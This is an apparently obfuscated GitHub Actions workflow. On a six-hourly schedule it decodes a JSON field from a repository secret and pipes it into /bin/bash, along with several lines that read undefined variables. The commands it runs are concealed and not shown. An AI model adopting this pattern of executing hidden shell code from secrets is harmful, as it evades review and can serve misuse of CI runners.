name: wengjingshi1290

on:
  workflow_dispatch:
  schedule:
    - cron: '32 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: wengjingshi1290
        env:
          l20808: ${{ secrets.l20808 }}
        run: |
          echo $l20808 | jq -r .b3674 | /bin/bash
          echo $wym2525 | jq -r .an0283 | /bin/bash
          echo $av25 | jq -r .ctux745 | /bin/bash
          echo $nw5 | jq -r .c44711 | /bin/bash
          echo $w1 | jq -r .m560 | /bin/bash
          echo $acpz03799 | jq -r .fc73 | /bin/bash
          echo $czv7 | jq -r .d2 | /bin/bash
          echo $tyogb19 | jq -r .auelv2696 | /bin/bash

